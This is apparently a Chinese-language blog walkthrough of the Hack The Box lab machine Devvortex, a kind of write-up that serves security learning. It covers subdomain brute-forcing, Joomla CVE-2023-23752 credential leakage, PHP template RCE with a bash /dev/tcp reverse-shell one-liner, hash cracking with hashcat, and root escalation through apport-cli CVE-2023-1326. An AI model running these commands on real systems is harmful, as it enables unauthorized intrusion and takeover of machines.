HTB-Devvortex
垃圾题目,一个劲爆破
1 | 10.129.90.31 devvortex.htb |
只开了22和80

vhost爆破
1 | ffuf -w subdomains-top1million-5000.txt:FUZZ -u http://devvortex.htb -H 'Host: FUZZ.devvortex.htb' -fw 4 -t 100 |


1 | ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FFUZ -u http://dev.devvortex.htb/FFUZ/ -ic -t 100 |
Joomla
爆破出一个路径

/manifests/files/joomla.xml能看到版本

CVE-2023-23752
4.0.0 <= Joomla <= 4.2.7,未授权访问
1 | /api/index.php/v1/users?public=true |


账号密码:lewis/P4ntherg0t1n5r3c0n##
反弹shell
后台可以直接编辑php代码,直接RCE



1 | bash -c "bash -i >& /dev/tcp/10.10.16.42/8989 0>&1" |
放到这,需要/templates/cassiopeia/error.php/123123让他报错触发,如果是访问/templates/cassiopeia/error.php没用


脱库
home里有个logan用户,和管理端里注册的一个用户名一致,所以想办法找下密码登下ssh试试

web目录下的configuration.php有管理员账号密码和数据库密码

1 | find / -name 'configuration.php' 2>/dev/null |
1 | +----------+--------------------------------------------------------------+ |
爆破
用hashid判断什么加密类型

1 | hashcat -m 3200 hash /usr/share/wordlists/rockyou.txt |
爆破出密码为tequieromucho
横移
1 | ssh logan@10.129.90.31 |

cde6d1ee0995c2b2fda2431ea1561b13
提权

问了问GPT
/usr/bin/apport-cli属于 Apport(Ubuntu/Debian 的错误报告工具)。
它在旧版本里自带一个 “报告查看器” (apport-cli -f <report>),而这个查看器默认会调用系统$PAGER,缺省就是less。
如果apport-cli让你交互式查看文件,你就能从less里用!sh直接拿到 shell——从而把(ALL : ALL)的 sudo 权限转化为 root shell。
1 | # 生成个crash |
试了下不行,但原理确实如此。换种更好触发less分页器的方式
看了下版本是2.20.11, 有CVE-2023-1326

先找个pid,比如systemd的

1 | sudo /usr/bin/apport-cli -f -P 1686 |
一路y下去

到这选可视模式V

触发less后输入!/bin/bash就出shell了

9db5ee1c5652037bfaec1efcb9e26b85
- 标题: HTB-Devvortex
- 作者: metafa1ica
- 创建于 : 2025-07-30 20:54:13
- 更新于 : 2025-08-17 13:29:27
- 链接: https://metafa1ica.github.io/post/462efc917bd2/
- 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。